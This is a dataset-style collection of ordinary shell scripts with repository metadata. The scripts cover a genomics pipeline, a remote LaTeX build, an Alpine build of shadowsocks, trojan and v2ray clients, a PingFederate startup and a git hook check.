printf " Firewall ${FIREWALL}\n"
printf " +-----------------------------------------------------+\n"
EOF
if [ -n "${APP}" ] ; then
cat << EOF >> /etc/profile.d/gwn-show-srv.sh
printf " Application Server ${APP}\n"
printf " +-----------------------------------------------------+\n"
EOF
fi
cat << EOF >> /etc/profile.d/gwn-show-srv.sh
printf " Last Highstate \$(find /etc/salt/last-highstate.txt -printf '%CY-%Cm-%Cd %Ca %CH:%CM %CZ')\n"
printf " Auto Highstate ${AUTO_DAY} hour ${AUTO_HR} quarter ${AUTO_QTR}\n"
printf " +-----------------------------------------------------+\n"
EOF
printf 'printf "\n"\n' >> /etc/profile.d/gwn-show-srv.sh
| true |
83bc1d4d76261eaf9b00c70be587d3bcbd42962f | Shell | pauloluniyi/seaConnect--dDocent | /main.sh | UTF-8 | 1,828 | 2.96875 | 3 | [] | no_license | #########################################################################
### set global variables
## species to process
#SPECIES=$1
SPECIES=mullus
#SPECIES=diplodus
## dDocent
CONTAINER=/entrepot/working/seaconnect/seaConnect--dDocent/seaconnect.simg
DDOCENT_CONFIG=/entrepot/working/seaconnect/seaConnect--dDocent/01-infos/ddocent_config.file
CONTAINER=/media/bigvol/eboulanger/seaconnect/seaconnect.simg
DDOCENT_CONFIG=/media/bigvol/eboulanger/seaconnect/01-infos/ddocent_config.file
#########################################################################
### RUN THE WORKFLOW
### create barcode files
bash 00-scripts barcodes.sh "${SPECIES}"
## demultiplexing
#### mullus surmuletus
snakemake -s 00-scripts/snakeFile.process_radtags -j 8 --use-singularity --configfile 01-infos/config_"${SPECIES}".yaml --singularity-args "-B /entrepot:/entrepot"
## clean
#rm -Rf 03-samples/* 10-logs/*
## DEmultiplexing MOnitoring Report Tool
bash 00-script/demort.sh "${SPECIES}" "${CONTAINER}"
## rename
#bash 00-scripts/rename.sh "${SPECIES}" 01-infos/"${SPECIES}"_sample_information.tsv
#### with blacklist
bash 00-scripts/rename.sh "${SPECIES}" 01-infos/"${SPECIES}"_sample_information.tsv 98-metrics/"${SPECIES}"_samples_blacklist.txt
#### add a reference genome fasta file to ddocent folder
ln -s /entrepot/donnees/genomes/"${SPECIES}"_genome.fasta 04-ddocent/"${SPECIES}"/reference.fasta
#### run the workflow "dDocent"
bash 00-scripts/ddocent.sh "${SPECIES}" "${CONTAINER}" "${DDOCENT_CONFIG}"
##filter remove indels
#vcftools --vcf 04-ddocent/"${SPECIES}"/TotalRawSNPs.vcf --remove-indels --recode-INFO-all --recode --out 05-vcf/"${SPECIES}"_snps &>10-logs/vcftools_"${SPECIES}".log
bash 00-scripts/rm_indels.sh "${SPECIES}" "${CONTAINER}"
#########################################################################
| true |
9252c174177cad5032887c5a3c8ae6c354673213 | Shell | blizzarac/dotfiles | /bin/docker-latex.sh | UTF-8 | 221 | 2.765625 | 3 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | filename=$2
host=$1
scp "$filename" "$host":~
ssh $host 'docker run --rm -i --user="$(id -u):$(id -g)" --net=none -v $PWD:/data blang/latex pdflatex '"$filename"
filename="${filename%.*}"
scp $host:~/"$filename".pdf . | true |
8bb90471443839971dceb2baac40d63c9f8f40ce | Shell | zzzop/stairspeedtest-reborn | /scripts/build.alpine.clients.sh | UTF-8 | 3,725 | 2.59375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
mkdir base/tools/clients
set -xe
apk add gcc g++ build-base linux-headers cmake make autoconf automake libtool curl
apk add openssl-dev openssl-libs-static libev-dev pcre-dev libsodium-dev libsodium-static c-ares-dev libevent-dev libevent-static mbedtls-dev mbedtls-static boost-dev boost-static mariadb-dev mariadb-static
git clone https://github.com/shadowsocks/simple-obfs --depth=1
cd simple-obfs
git submodule update --init
./autogen.sh
./configure --disable-documentation
make -j4
gcc $(find src/ -name "obfs_local-*.o") $(find . -name "*.a") -o simple-obfs -static -lev -s
mv simple-obfs ../base/tools/clients/
cd ..
git clone https://github.com/shadowsocks/shadowsocks-libev --depth=1
cd shadowsocks-libev
git submodule update --init
./autogen.sh
./configure --disable-documentation
make -j4
gcc $(find src/ -name "ss_local-*.o") $(find . -name "*.a") -o ss-local -static -lpcre -lmbedtls -lmbedcrypto -lev -lsodium -s
mv ss-local ../base/tools/clients/
cd ..
git clone -b Akkariiin/develop --single-branch --depth=1 https://github.com/shadowsocksrr/shadowsocksr-libev
cd shadowsocksr-libev
# fix codes
sed -i "s/^const/extern const/g" src/tls.h
sed -i "s/^const/extern const/g" src/http.h
./autogen.sh
./configure --disable-documentation
make -j4
gcc $(find src/ -name "ss_local-*.o") $(find . -name "*.a") -o ssr-local -static -lpcre -lssl -lcrypto -lev -lsodium -s
mv ssr-local ../base/tools/clients/
cd ..
git clone https://github.com/trojan-gfw/trojan --depth=1
cd trojan
cmake -DDEFAULT_CONFIG=config.json -DFORCE_TCP_FASTOPEN=ON .
make -j4
g++ $(find CMakeFiles/trojan.dir/src/ -name "*.o") -o trojan -static -lmysqlclient -lboost_program_options -lssl -lcrypto -lz -s
mv trojan ../base/tools/clients/
cd ..
if [[ "$ARCH" = "x86_64" ]];then
curl -LO https://github.com/v2fly/v2ray-core/releases/latest/download/v2ray-linux-64.zip
curl -LO https://github.com/joewalnes/websocketd/releases/download/v0.4.1/websocketd-0.4.1-linux_amd64.zip
curl -LO https://github.com/shadowsocks/v2ray-plugin/releases/download/v1.3.1/v2ray-plugin-linux-amd64-v1.3.1.tar.gz
else if [[ "$ARCH" = "x86" ]];then
curl -LO https://github.com/v2fly/v2ray-core/releases/latest/download/v2ray-linux-32.zip
curl -LO https://github.com/joewalnes/websocketd/releases/download/v0.4.1/websocketd-0.4.1-linux_386.zip
curl -LO https://github.com/shadowsocks/v2ray-plugin/releases/download/v1.3.1/v2ray-plugin-linux-386-v1.3.1.tar.gz
else
if [[ "$ARCH" = "aarch64" ]];then
curl -LO https://github.com/joewalnes/websocketd/releases/download/v0.4.1/websocketd-0.4.1-linux_arm64.zip
curl -LO https://github.com/v2fly/v2ray-core/releases/latest/download/v2ray-linux-arm64-v8a.zip
curl -LO https://github.com/shadowsocks/v2ray-plugin/releases/download/v1.3.1/v2ray-plugin-linux-arm64-v1.3.1.tar.gz
else if [[ "$ARCH" = "armhf" ]];then
curl -LO https://github.com/joewalnes/websocketd/releases/download/v0.4.1/websocketd-0.4.1-linux_arm.zip
curl -LO https://github.com/v2fly/v2ray-core/releases/latest/download/v2ray-linux-arm32-v7a.zip
curl -LO https://github.com/shadowsocks/v2ray-plugin/releases/download/v1.3.1/v2ray-plugin-linux-arm-v1.3.1.tar.gz
fi
fi
fi
fi
unzip v2ray*.zip v2ray v2ctl
unzip websocketd*.zip websocketd
if [[ "$ARCH" = "armhf" ]];then
tar xvf v2ray-plugin*.gz v2ray-plugin_linux_arm7
else
tar xvf v2ray-plugin*.gz
fi
strip -s websocketd
mv v2ray-plugin_* base/tools/clients/v2ray-plugin
mv v2ray base/tools/clients/
mv v2ctl base/tools/clients/
mv websocketd base/tools/gui/
chmod +rx base/tools/clients/* base/tools/gui/websocketd
| true |
90e64fd447be4ae9beffefe57caf9ae4cb3b90b2 | Shell | jonlehtinen/pfadmin_pfengine_ubuntu | /PingFederate/docker-build-files/pingfederate/bin/startup.sh | UTF-8 | 332 | 2.5625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
if [ $NODE_ROLE = "CLUSTERED_CONSOLE" ] ; then
aws s3 cp $DATA_HOME/data.zip $PF_HOME/server/default/data/drop-in-deployer/data.zip
fi
$PF_HOME/bin/run.sh &
if [ $NODE_ROLE = "CLUSTERED_CONSOLE" ] ; then
sleep 120
$PF_HOME/bin/replicate.sh &
sleep 1680
$PF_HOME/bin/export.sh &
fi
sleep infinity
| true |
75bcd1cbef8128330f3872d4ea61aff553490c1b | Shell | zhaosaisai/test-changelog | /check_command.sh | UTF-8 | 271 | 3.140625 | 3 | [] | no_license | #!/bin/sh
#yorkie 2.0.0
command_exists () {
command -v "$1" >/dev/null 2>&1
}
# check command node is exist? for git-cz command
check_node () {
command_exists node || {
echo
echo "command 'node' is not exists and skip the hook"
exit 0
}
}
check_node
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.